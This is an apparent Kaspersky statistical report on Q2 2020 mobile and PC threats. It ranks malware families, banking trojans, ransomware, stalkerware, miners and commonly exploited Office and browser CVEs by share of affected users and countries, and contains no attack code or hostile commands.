The Opfake and Fakeinst families are among the oldest mobile threats known to Kaspersky. It is safe to say that their discovery in the wild is more of an echo of past large-scale distribution campaigns. This is supported by the fact that most of the malware detected no longer had functioning control centers. Since the main means of distributing these trojans are fake application websites, one can assume that during lockdown users are more likely to turn to such resources in search of free content and thus provide the malware families with a statistical boost.

Top 20 mobile malware programs

Note that this malware rating does not include potentially dangerous or unwanted programs, such as RiskTool or AdWare.

Verdict %* 1 DangerousObject.Multi.Generic 40.29 2 Trojan.AndroidOS.Boogr.gsh 9.02 3 DangerousObject.AndroidOS.GenericML 6.17 4 Trojan-Downloader.AndroidOS.Necro.d 4.86 5 Trojan-Dropper.AndroidOS.Hqwar.cf 3.63 6 Trojan.AndroidOS.Hiddad.fi 3.19 7 Trojan-Downloader.AndroidOS.Helper.a 2.84 8 Trojan-Downloader.AndroidOS.Agent.hy 2.64 9 Trojan.AndroidOS.Agent.vz 2.32 10 Trojan-Downloader.AndroidOS.Agent.ik 2.06 11 Trojan.AndroidOS.Handda.san 2.04 12 Trojan.AndroidOS.MobOk.v 1.89 13 Trojan-Downloader.AndroidOS.Agent.ic 1.84 14 Trojan.AndroidOS.MobOk.x 1.67 15 Trojan-Dropper.AndroidOS.Hqwar.gen 1.54 16 Trojan-Dropper.AndroidOS.Helper.n 1.45 17 Trojan-Banker.AndroidOS.Rotexy.e 1.36 18 Trojan-Downloader.AndroidOS.Malota.a 1.29 19 Trojan-Dropper.AndroidOS.Penguin.e 1.24 20 Trojan.AndroidOS.Dvmap.a 1.13

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked.

As per tradition, first place in our Top 20 for Q2 went to the DangerousObject.Multi.Generic verdict (40.29%), which we use for malware detected using cloud technologies. Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company’s cloud already contains information about the object. This is basically how the latest malicious programs are detected.

Second and third places were claimed by Trojan.AndroidOS.Boogr.gsh (9.02%) and DangerousObject.AndroidOS.GenericML (6.17%). These verdicts are assigned to files recognized as malicious by our machine-learning systems.

In fourth place, as in the last quarter, is Trojan-Downloader.AndroidOS.Necro.d (4.86%). This Trojan family is closely associated with various classes of Triada group of complex threats, as well as the xHelper Trojan family, whose members took the seventh and sixteenth positions in the rankings, respectively. A distinctive feature of Necro trojans, which leads to serious problems for its victims, is their ability to take root on the device by escalating access rights. Having obtained root privileges, such trojans can write themselves to the device’s read-only memory, preventing the user from removing the malware with built-in tools.

Fifth and fifteenth places in the rankings were taken by representatives of the Trojan-Dropper.AndroidOS.Hqwar family. This is the most popular dropper in the wild: if you look at the number of detected droppers from various families, you will find Hqwar in second position, immediately after the Agent generalized verdict. In Q2 2020, the share of the Hqwar family among all detected droppers increased markedly to 30.12% from 8% in Q1 2020.

TOP 3 detected droppers

Verdict % Agent 30.38% Hqwar 30.32% Wapnor 30.12%

The sixth position in the rankings went to Trojan.AndroidOS.Hiddad.fi (3.19%), whose capabilities include displaying advertising banners and concealing its activities.

Members of Trojan-Downloader.AndroidOS.Agent took the eighth, tenth and thirteenth positions. These trojans have the simple task of downloading modules from the C2 and running these. The downloaded modules are often adware, but we have seen trojan payloads as well.

Trojan.AndroidOS.vz (2.32%) took the ninth place. Apparently, this Trojan served as a payload for a different type of malware, with Agent.vz’s task coming down to downloading executable code as well. This suggests that the malware is only an intermediate link in the infection chain.

In the eleventh place, we find the Trojan.AndroidOS.Handda.san trojan (2.04%). This verdict covers a whole group of malware, which includes a variety of trojans united by common capabilities: hiding their icons, obtaining Device Admin rights and using packers to counteract detection.

The twelfth and fourteenth places went to members of the Trojan.AndroidOS.MobOk family. These trojans are a link in infection chains and most commonly have been detected with mobile users from Russia.

As in Q1 2020, the twenty most common threats included the bank trojan Rotexy (1.36%). It is worth noting that this is likely not the only widespread banker, as more popular Hqwar droppers often conceal financial malware.

In the eighteenth place we see Trojan-Downloader.AndroidOS.Malota.a (1.29%). We have known this trojan since October 2019. Its main task is to download executable code from the C2 to the infected device.

Geography of mobile threats

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Map of mobile malware infection attempts, Q2 2020 (download)

Top 10 countries by share of users attacked by mobile malware

Country* %** 1 Iran 43.62 2 Algeria 21.97 3 Bangladesh 19.30 4 Morocco 17.57 5 Nigeria 15.12 6 India 13.54 7 Saudi Arabia 13.52 8 Kenya 12.61 9 Indonesia 12.17 10 Pakistan 12.16

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10000).
** Unique users attacked in the country as a share of all users of Kaspersky mobile security solutions in the country.

The TOP 3 countries with the largest user shares remained unchanged in Q2: Iran (43.62%) followed by Algeria (21.97%) and Bangladesh (19.30%).

Most commonly detected in Iran were AdWare.AndroidOS.Notifyer-family adware, alternate Telegram clients (RiskTool.AndroidOS.FakGram.d, for instance, is one of the ten most commonly detected threats in Iran), and Trojan.AndroidOS.Hiddap-family trojans. The latter have a variety of tools and one common feature: the tendency to hide their icons from the app manager screen.

HiddenAd and FakeAdBlocker adware was most common in Algeria, a similar situation to Q1 2020.

In Bangladesh, the leader is HiddenAd-family adware, which conceals their carrier application. AdWare.AndroidOS.Outad.c (fifth place within the country) and AdWare.AndroidOS.Loead (sixth place) adware types were common as well.

Mobile web threats

The statistics presented here are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

Hackers use a variety of techniques to attract potential victims to malicious landing pages, from rogue SEO for displaying their sites in top ten results for certain search queries to redirect chains that will quickly and discreetly take the user from a legitimate site to a malicious one. We decided to calculate the countries where mobile users were most likely to encounter malicious websites while browsing the Web and where these sites are located.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of the countries with the highest risk of infection via web resources, Q2 2020 (download)

Ten countries with the highest risk of infection

Country* % of attacked users** Morocco 7.08 Algeria 6.25 Ecuador 6.05 Saudi Arabia 5.24 Oman 4.98 India 4.93 Vietnam 4.63 Kuwait 4.47 UAE 4.27 Brazil 4.25

* Excluded are countries with relatively few Kaspersky mobile product users (under 10,000).
** Unique users targeted by all types of web attacks as a share of all unique users of Kaspersky mobile products in the country.

Countries where mobile web threats are based

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of countries where mobile attacks are based, Q2 2020 (download)

TOP 10 countries where the largest numbers of mobile attacks are based

Country %* Netherlands 51.17 USA 32.87 Dominican Republic 8.36 Singapore 3.64 Germany 1.53 Russian Federation 1.00 Luxembourg 0.44 Ireland 0.32 France 0.19 India 0.05

* Share of mobile threat sources in the country out of the total number of such sources

The Netherlands and the United States topped the list of web threat sources in Q2 2020. The Netherlands accounted for more than half of all attacks, typically engaging advertising-related websites. The United States were the other most common source of a similar type of threats.

Mobile banking Trojans

During the reporting period, we detected 38,951 mobile banking trojan installer packages, 3,164 fewer than in Q1 2020.

TOP 10 detected bankers

1 Agent 58.7% 2 Wroba 8.3% 3 Zitmo 8.2% 4 Rotexy 6.5% 5 Knobot 4.4% 6 Anubis 3.8% 7 Faketoken 3.0% 8 Cebruser 2.4% 9 Asacub 1.0% 10 Ginp 0.9%

The Trojan-Banker.AndroidOS.Agent family made the largest contribution to the number of packages detected: 58.7% of all discovered banking trojans. The Trojan-Banker.AndroidOS.Wroba family (8.3%) was second, far behind the leader, and immediately followed by Trojan-Banker.AndroidOS.Zitmo (8.2%).

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages for mobile banking Trojans detected by Kaspersky, Q2 2019 – Q2 2020 (download)

TOP 10 mobile bankers

Verdict %* 1 Trojan-Banker.AndroidOS.Rotexy.e 13.29 2 Trojan-Banker.AndroidOS.Svpeng.q 9.66 3 Trojan-Banker.AndroidOS.Agent.eq 6.48 4 Trojan-Banker.AndroidOS.Asacub.snt 6.45 5 Trojan-Banker.AndroidOS.Asacub.ce 5.59 6 Trojan-Banker.AndroidOS.Anubis.san 5.49 7 Trojan-Banker.AndroidOS.Faketoken.snt 4.34 8 Trojan-Banker.AndroidOS.Anubis.n 3.49 9 Trojan-Banker.AndroidOS.Hqwar.t 3.14 10 Trojan-Banker.AndroidOS.Asacub.a 3.09

* Unique users attacked by this malware as a share of all Kaspersky mobile security solution users attacked by banking threats.

The first and second places on our list went to mobile bankers that targeted mobile users from Russia: Trojan-Banker.AndroidOS.Rotexy.e (13.29%) and Trojan-Banker.AndroidOS.Svpeng.q (9.66%).

Various members of the Asacub family took three positions out of ten on the TOP 10 for mobile financial threats. Although this threat family is not particularly numerous, it is very popular with attackers.

The Anubis banker family gained popularity in Q2 2020, with its members occupying the sixth and eighth positions. We believe that these versions of the trojan were built from source code leaked onto the Internet.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile banking threats, Q2 2020 (download)

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %** 1 Turkey 1.29% 2 Japan 0.90% 3 Spain 0.71% 4 Italy 0.65% 5 Taiwan 0.49% 6 China 0.19% 7 Tajikistan 0.16% 8 Korea 0.14% 9 Russia 0.14% 10 Poland 0.13%

* Excluded from the rating are countries with relatively few users of Kaspersky mobile security solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a share of all users of Kaspersky mobile security solutions in the country.

Turkey had the largest share of unique users attacked by mobile financial threats in Q2 2020, 1.29%. Members of the Trojan-Banker.AndroidOS.Cebruser family were most commonly detected there.

Turkey was followed by Spain with 0.71%. The rankings of mobile financial threats in this country were as follows:

Verdict % Trojan-Banker.AndroidOS.Ginp.snt 36.60% Trojan-Banker.AndroidOS.Cebruser.san 25.57% Trojan-Banker.AndroidOS.Cebruser.pac 22.43% Trojan-Banker.AndroidOS.Knobot.g 5.19% Trojan-Banker.AndroidOS.Knobot.pac 4.89% Trojan-Banker.AndroidOS.Knobot.c 3.73% Trojan-Banker.AndroidOS.Knobot.h 3.43% Trojan-Banker.AndroidOS.Agent.eq 2.99% Trojan-Banker.AndroidOS.Knobot.c 2.63% Trojan-Banker.AndroidOS.Cebruser.b 2.12%

Unlike the Ginp and Cebruser mobile bankers, which we have mentioned in the past, Knobot is a relatively new player on the market for threats that target financial data. Along with phishing windows and interception of 2FA verification messages, the trojan has several tools that are uncharacteristic of financial threats. An example of these is hijacking device PINs through exploitation of Accessibility Services. The attackers probably require the PIN in case they need to control the device manually in real time.

Mobile ransomware Trojans

In Q2 2020, we detected 3,805 installation packages for mobile Trojan ransomware, which is 534 fewer than last quarter.

The number of detected objects has been decreasing from quarter to quarter. We believe that there are two main causes:

  • It is much harder to extort cash from users than to steal the bank account data right away. At the same time, the device needs to be previously infected in either case, so with the costs being equal, cybercriminals will choose the path of least resistance, i.e. theft.
  • A ransomware trojan is a threat the user will likely want to fight to get the device back to a functional state. The user is likely to win, too, even if by factory-resetting the device. Cybercriminals, in their turn, try to keep their malware undetected on the device as long as possible, which runs counter to the whole idea of mobile ransomware.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of installation packages for mobile ransomware Trojans detected by Kaspersky, Q2 2019 – Q2 2020 (download)

Attacks reveal a similar pattern: the number of users attacked by ransomware trojans in Q2 2020 fell threefold compared to Q2 2019.

Verdict %* 1 Trojan-Ransom.AndroidOS.Small.as 14.27 2 Trojan-Ransom.AndroidOS.Agent.bq 8.46 3 Trojan-Ransom.AndroidOS.Svpeng.aj 7.67 4 Trojan-Ransom.AndroidOS.Small.o 5.77 5 Trojan-Ransom.AndroidOS.Rkor.k 5.37 6 Trojan-Ransom.AndroidOS.Agent.bo 5.01 7 Trojan-Ransom.AndroidOS.Congur.am 4.32 8 Trojan-Ransom.AndroidOS.Small.ce 3.65 9 Trojan-Ransom.AndroidOS.Fusob.h 3.42 10 Trojan-Ransom.AndroidOS.Soobek.a 3.01

* Unique users attacked by this malware as a share of all Kaspersky mobile antivirus users attacked by ransomware trojans.

The list TOP 10 ransomware trojans detected in Q2 2020 contains only two new species: Trojan-Ransom.AndroidOS.Agent.bq (8,46%) and Trojan-Ransom.AndroidOS.Agent.bo (5.01%). All the rest were originally developed in 2017–2019 and have been kept relevant by their creators through minor code changes.

The aforementioned Agent.bq and Agent.bo, like various other trojan classes, notably contain code that exploits Accessibility Services. In the case of these two, however, the code is used for screen locking and delete protection, literally leaving the victim no chances to remove the trojan without an external utility, such as ADB. However, ADB cannot always be used for removing the ransomware either: developer mode, which it requires, is deactivated on an overwhelming majority of devices.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of mobile ransomware Trojans, Q2 2020 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans:

Country* %** 1 Kazakhstan 0.41 2 Malaysia 0.10 3 USA 0.10 4 Iran 0.09 5 Indonesia 0.07 6 Saudi Arabia 0.04 7 Vietnam 0.03 8 Italy 0.02 9 Algeria 0.02 10 Romania 0.02

* Excluded from the rating are countries with relatively few Kaspersky mobile antivirus users (under 10000).
** Unique users attacked by mobile ransomware Trojans in the country as a percentage of all users of Kaspersky mobile solutions in the same country.

Kazakhstan (0.41%), Malaysia (0.10%) and the United States (0.10%) saw the largest shares of users attacked by mobile ransomware trojans.

Stalkerware

This section uses statistics collected by Kaspersky Mobile Antivirus security solution.

The past second quarter of 2020 seems not to have been the most successful one for stalkerware developers. Many of the countries were this type of spyware enjoyed popularity went on a lockdown or imposed self-isolation requirements, which resulted in stalkerware users finding themselves locked up for a long period of time with those they intended to spy on. One can assume this led to a decrease in the number of mobile devices on which we detected stalkerware. At the same time, we discovered ten previously unknown families of stalker software in Q2 2020:

  1. AndroidOS.Andropol.a
  2. AndroidOS.AndTrace.a
  3. AndroidOS.Basmon.a
  4. AndroidOS.Flashlog.a
  5. AndroidOS.Floatspy.a
  6. AndroidOS.FoneSpy.a
  7. AndroidOS.GmSpy.a
  8. AndroidOS.Spytm.a
  9. AndroidOS.UniqSpy.a
  10. AndroidOS.Xnspy.a

It would hence be incorrect to assume that developers have lost interest in creating this type of programs. We will continue to monitor new samples, as none of the families listed above were popular enough in Q2 2020 to get on the list of the ten most common stalkerware types.

TOP 10 stalkerware

Verdicts % 1 Monitor.AndroidOS.Cerberus.a 14.21% 2 Monitor.AndroidOS.Nidb.a 13.66% 3 Monitor.AndroidOS.MobileTracker.c 5.56% 4 Monitor.AndroidOS.Agent.af 5.07% 5 Monitor.AndroidOS.Anlost.a 4.20% 6 Monitor.AndroidOS.PhoneSpy.b 3.39% 7 Monitor.AndroidOS.Agent.a 2.56% 8 Monitor.AndroidOS.Agent.hb 2.37% 9 Monitor.AndroidOS.SecretCam.a 2.27% 10 Monitor.AndroidOS.Traca.a 2.25% 11 Monitor.AndroidOS.Alltracker.a 2.22% 12 Monitor.AndroidOS.Agent.al 2.15% 13 Monitor.AndroidOS.SpyHuman.c 2.10% 14 Monitor.AndroidOS.Wspy.a 1.91% 15 Monitor.AndroidOS.Agent.gt 1.73% 16 Monitor.AndroidOS.MonitorMinor.e 1.62% 17 Monitor.AndroidOS.Reptilic.a 1.49% 18 Monitor.AndroidOS.Agent.he 1.43% 19 Monitor.AndroidOS.Anfur.a 1.39% 20 Monitor.AndroidOS.Talkw.a 1.25%

 

The rankings include long-standing, widely used commercial stalkerware families, among others, MonitorMinor, which we wrote about in the first quarter of this year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of stalkerware distribution, Q2 2020 (download)

Russia had the largest number of users whose devices were found to contain stalkerware in Q2 2020. It was followed closely by Brazil. India came third, having half of Russia’s number of users that had encountered stalkerware.

Both Russia and Brazil notably showed an encouraging trend, with the number of devices containing stalkerware dropping significantly in the second quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of devices with stalkerware in Russia, Q1 2019 – Q2 2020 (download)

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of devices with stalkerware in Brazil, Q1 2019 – Q2 2020 (download)

As for India, its statistics remained relatively unchanged in the second quarter of the year.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of devices with stalkerware in India, Q1 2019 – Q2 2020 (download)

2020. szeptember 3.

IT threat evolution Q2 2020. PC statistics

IT threat evolution Q2 2020. Review
IT threat evolution Q2 2020. Mobile statistics

These statistics are based on detection verdicts of Kaspersky products received from users who consented to provide statistical data.

Quarterly figures

According to Kaspersky Security Network, in Q2:

  • Kaspersky solutions blocked 899,744,810 attacks launched from online resources in 191 countries across the globe.
  • As many as 286,229,445 unique URLs triggered Web Anti-Virus components.
  • Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 181,725 unique users.
  • Ransomware attacks were defeated on the computers of 154,720 unique users.
  • Our File Anti-Virus detected 80,993,511 unique malware and potentially unwanted objects.
Financial threats Financial threat statistics

In Q2 2020, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 181,725 users.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by financial malware, Q2 2020 (download)

Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of financial malware attacks, Q2 2020 (download)

Top 10 countries by share of attacked users

Country* %** 1 Turkmenistan 7.5 2 Uzbekistan 5.7 3 Tajikistan 5.6 4 Afghanistan 2.6 5 Macedonia 2.6 6 Yemen 2.2 7 Syria 1.9 8 Kazakhstan 1.7 9 Cyprus 1.7 10 Iran 1.5

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users of Kaspersky products whose computers were targeted by financial malware as a share of all unique users of Kaspersky products in the country.

Among the banking Trojan families, the share of Backdoor.Win32.Emotet decreased markedly from 21.3% to 6.6%. This botnet’s activity decreased at the end of Q1 2020, but the results only became clear in the second quarter. However, as we prepared this report, we noticed that Emotet was gradually recovering.

Top 10 banking malware families

Name Verdicts %* 1 Zbot Trojan.Win32.Zbot 24.8 2 RTM Trojan-Banker.Win32.RTM 18.6 3 CliptoShuffler Trojan-Banker.Win32.CliptoShuffler 15.4 4 Emotet Backdoor.Win32.Emotet 6.6 5 Trickster Trojan.Win32.Trickster 4.7 6 Nimnul Virus.Win32.Nimnul 4.3 7 Danabot Trojan-Banker.Win32.Danabot 3.4 8 SpyEye Trojan-Spy.Win32.SpyEye 3.0 9 Nymaim Trojan.Win32.Nymaim 2.5 10 Neurevt Trojan.Win32.Neurevt 1.4

** Unique users attacked by this malware family as a percentage of all users attacked by financial malware.

Ransomware programs Quarterly trend highlights

The attackers behind the Shade ransomware announced that they had ceased to distribute the Trojan. In addition, they published keys to decrypt files affected by all of its versions. The number of keys that had been accumulated over the years exceeded 750,000, and we updated our ShadeDecryptor utility to help Shade victims to regain access to their data.

Ransomware written in Go began surfacing more often than before. Examples of recently discovered Trojans include Sorena, Smaug, Hydra, Satan/M0rphine, etc. What is this: hackers showing an interest in new technology, ease of development or an attempt at making researchers’ work harder? No one knows for sure.

Number of new modifications

We detected five new ransomware families and 4,406 new modifications of these malware programs in Q2 2020.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new ransomware modifications detected, Q2 2019 – Q1 2020 (download)

Number of users attacked by ransomware Trojans

Kaspersky products and technologies protected 154,720 users from ransomware attacks in Q2 2020.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by ransomware Trojans, Q2 2020 (download)

Geography of attacks

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of attacks by ransomware Trojans, Q2 2020 (download)

Top 10 countries attacked by ransomware Trojans

Country* %** 1 Bangladesh 1.69% 2 Mozambique 1.16% 3 Uzbekistan 1.14% 4 Egypt 0.97% 5 Ethiopia 0.94% 6 China 0.74% 7 Afghanistan 0.67% 8 Pakistan 0.57% 9 Vietnam 0.55% 10 Mongolia 0.49%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by Trojan encryptors as a share of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans Name Verdicts %* 1 WannaCry Trojan-Ransom.Win32.Wanna 14.74% 2 (generic verdict) Trojan-Ransom.Win32.Gen 9.42% 3 (generic verdict) Trojan-Ransom.Win32.Generic 7.47% 4 (generic verdict) Trojan-Ransom.Win32.Encoder 7.11% 5 Stop Trojan-Ransom.Win32.Stop 7.06% 6 GandCrab Trojan-Ransom.Win32.GandCrypt 4.68% 7 (generic verdict) Trojan-Ransom.Win32.Crypren 4.28% 8 (generic verdict) Trojan-Ransom.Win32.Phny 3.29% 9 Cerber Trojan-Ransom.Win32.Zerber 2.19% 10 Crysis/Dharma Trojan-Ransom.Win32.Crusis 2.16%

* Unique Kaspersky users attacked by the specified family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners Number of new modifications

Kaspersky solutions detected 3,672 new miner modifications in Q2 2020, which is several dozen times fewer than in the previous quarter.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of new miner modifications, Q2 2020 (download)

The difference can be explained by thousands of modifications of one miner family, which were detected in the first quarter. In the quarter under review, that miner’s activity dwindled, which is reflected in the statistics.

Number of users attacked by miners

We detected miner attacks on the computers of 440,095 unique Kaspersky users worldwide in Q2 2020. This type of threats shows a clear downward trend.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Number of unique users attacked by miners, Q2 2020 (download)

Geography of attacks

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of miner attacks, Q2 2020 (download)

Top 10 countries attacked by miners

Country* %** 1 Afghanistan 4.08% 2 Ethiopia 4.04% 3 Uzbekistan 2.68% 4 Tanzania 2.57% 5 Vietnam 2.17% 6 Rwanda 2.11% 7 Kazakhstan 2.08% 8 Sri Lanka 1.97% 9 Mozambique 1.78% 10 Belarus 1.41%

* Excluded are countries with relatively few Kaspersky product users (under 50,000).
** Unique users whose computers were attacked by miners as a share of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyberattacks

Exploit distribution statistics for Q2 2020, as before, show that vulnerabilities in the Microsoft Office suite are the most common ones. However, their share decreased to 72% in the last quarter. The same vulnerabilities we had seen before still topped the list. CVE-2017-8570, which allows inserting a malicious script into an OLE object placed inside an Office document, was the most commonly exploited vulnerability. It was followed by the Q1 favorite, CVE-2017-11882. This vulnerability exploits a stack overflow error in the Equation Editor component of the Office suite. CVE-2017-8570, a vulnerability similar to CVE-2017-0199, came third. The remaining positions on the TOP 5 list were occupied by CVE-2018-0802 and CVE-2017-8759.

The second category (exploits for popular browsers) accounted for about 12% in Q2, its share increasing slightly when compared to the previous period. During the reporting period, cybercriminals attacked Firefox using the CVE-2020-6819 vulnerability, which allows malicious code to be executed when an HTTP header is parsed incorrectly. Exploits that use the vulnerabilities in the ReadableStream interface, such as CVE-2020-6820, have been observed as well. No major vulnerability exploited to spread malware was observed during the reporting period for any of the other popular browsers: Google Chrome, Microsoft Edge, or Internet Explorer. However, fixes for a number of vulnerabilities that could potentially have been used for creating exploits, but were detected by researchers in time, were announced to software manufacturers.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2020 (download)

The first quarter set a trend for researching font and other graphic primitives subsystems in Windows. In Q2, two vulnerabilities were discovered in Windows Codecs Library, assigned CVE-2020-1425 and CVE-2020-1457 codes. Both were fixed, and neither is known to have been exploited in the wild. Another interesting vulnerability fixed in the last quarter is CVE-2020-1300. It allows for remote execution of code due to incorrect processing of Cabinet files, for example, if the user is trying to run a malicious CAB file pretending to be a printer driver. Notably, the CVE-2020-1299 vulnerability allowed the attacker to execute arbitrary code with the user’s privileges by generating a specially formatted LNK file.

The trend for brute-forcing of Remote Desktop Services, Microsoft SQL Services and SMB access passwords persisted in Q2 2020. No full-on network attacks that exploited new vulnerabilities in network exchange protocols were detected. However, software developers did discover and fix several vulnerabilities in popular network services. Among the most interesting ones were CVE-2020-1301 for SMBv1, which allowed the attacker to execute code remotely on a target system. CVE-2020-0796 (SmbGhost), a popular SMBv3 vulnerability among researchers, received unexpected follow-up in the form of an exploit that allowed compromising the system without interacting with the user. The same protocol version was found to contain an error, designated as CVE-2020-1206 and known as the SMBleed vulnerability, which allowed the attacker to get a portion of the Windows kernel memory. The researchers even published several exploit versions that used a bundle of SMBleed and SMBGhost to execute the code with system privileges. In that mode, the attacker can install any software and access any information on the computer.

